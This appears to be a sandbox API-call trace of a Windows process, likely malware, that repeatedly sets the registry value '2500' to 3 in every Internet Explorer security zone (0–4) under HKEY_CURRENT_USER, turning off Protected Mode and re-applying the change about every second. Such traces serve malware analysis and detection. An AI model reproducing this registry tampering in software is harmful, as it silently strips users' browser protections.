	[0116.546] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0116.546] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0116.546] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0116.546] RegCloseKey (hKey=0x698) returned 0x0
	[0116.546] Sleep (dwMilliseconds=0x3e8) 
	[0117.604] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0117.605] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0117.605] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0117.605] RegCloseKey (hKey=0x698) returned 0x0
	[0117.606] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0117.606] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0117.606] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0117.606] RegCloseKey (hKey=0x698) returned 0x0
	[0117.606] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0117.606] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0117.606] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0117.606] RegCloseKey (hKey=0x698) returned 0x0
	[0117.606] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0117.606] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0117.606] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0117.606] RegCloseKey (hKey=0x698) returned 0x0
	[0117.606] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0117.606] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0117.606] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0117.606] RegCloseKey (hKey=0x698) returned 0x0
	[0117.606] Sleep (dwMilliseconds=0x3e8) 
	[0118.607] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0118.607] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0118.607] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0118.607] RegCloseKey (hKey=0x698) returned 0x0
	[0118.607] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0118.607] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0118.607] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0118.608] RegCloseKey (hKey=0x698) returned 0x0
	[0118.608] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0118.608] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0118.608] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0118.608] RegCloseKey (hKey=0x698) returned 0x0
	[0118.608] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0118.608] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0118.608] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0118.608] RegCloseKey (hKey=0x698) returned 0x0
	[0118.608] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0118.608] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0118.608] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0118.608] RegCloseKey (hKey=0x698) returned 0x0
	[0118.608] Sleep (dwMilliseconds=0x3e8) 
	[0119.640] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.640] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.641] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.641] RegCloseKey (hKey=0x698) returned 0x0
	[0119.641] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.641] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.641] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.641] RegCloseKey (hKey=0x698) returned 0x0
	[0119.641] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.641] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.641] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.642] RegCloseKey (hKey=0x698) returned 0x0
	[0119.642] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.642] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.642] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.642] RegCloseKey (hKey=0x698) returned 0x0
	[0119.642] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.642] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.642] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.642] RegCloseKey (hKey=0x698) returned 0x0
	[0119.642] Sleep (dwMilliseconds=0x3e8) 
	[0119.644] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.644] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.644] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.644] RegCloseKey (hKey=0x698) returned 0x0
	[0119.644] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.644] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.644] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.644] RegCloseKey (hKey=0x698) returned 0x0
	[0119.644] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.644] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.644] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.644] RegCloseKey (hKey=0x698) returned 0x0
	[0119.644] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.644] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.644] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.644] RegCloseKey (hKey=0x698) returned 0x0
	[0119.644] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.645] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.645] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.645] RegCloseKey (hKey=0x698) returned 0x0
	[0119.645] Sleep (dwMilliseconds=0x3e8) 
	[0119.647] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.647] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.647] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.647] RegCloseKey (hKey=0x698) returned 0x0
	[0119.647] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.647] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.647] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.647] RegCloseKey (hKey=0x698) returned 0x0
	[0119.647] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.647] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.647] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.647] RegCloseKey (hKey=0x698) returned 0x0
	[0119.647] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.647] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.647] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.647] RegCloseKey (hKey=0x698) returned 0x0
	[0119.647] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.647] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.648] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.648] RegCloseKey (hKey=0x698) returned 0x0
	[0119.648] Sleep (dwMilliseconds=0x3e8) 
	[0119.653] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.653] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.653] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.653] RegCloseKey (hKey=0x698) returned 0x0
	[0119.653] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.653] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.653] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.653] RegCloseKey (hKey=0x698) returned 0x0
	[0119.653] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.653] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.653] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.654] RegCloseKey (hKey=0x698) returned 0x0
	[0119.654] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.654] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.654] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.654] RegCloseKey (hKey=0x698) returned 0x0
	[0119.654] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.654] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.654] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.654] RegCloseKey (hKey=0x698) returned 0x0
	[0119.654] Sleep (dwMilliseconds=0x3e8) 
	[0119.656] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.656] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.656] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.656] RegCloseKey (hKey=0x698) returned 0x0
	[0119.656] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.656] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.656] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.656] RegCloseKey (hKey=0x698) returned 0x0
	[0119.656] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.656] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.656] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.656] RegCloseKey (hKey=0x698) returned 0x0
	[0119.656] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.656] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.656] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.656] RegCloseKey (hKey=0x698) returned 0x0
	[0119.656] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.657] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.657] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.657] RegCloseKey (hKey=0x698) returned 0x0
	[0119.657] Sleep (dwMilliseconds=0x3e8) 
	[0119.681] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.681] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.681] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.681] RegCloseKey (hKey=0x698) returned 0x0
	[0119.684] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.684] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.685] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.685] RegCloseKey (hKey=0x698) returned 0x0
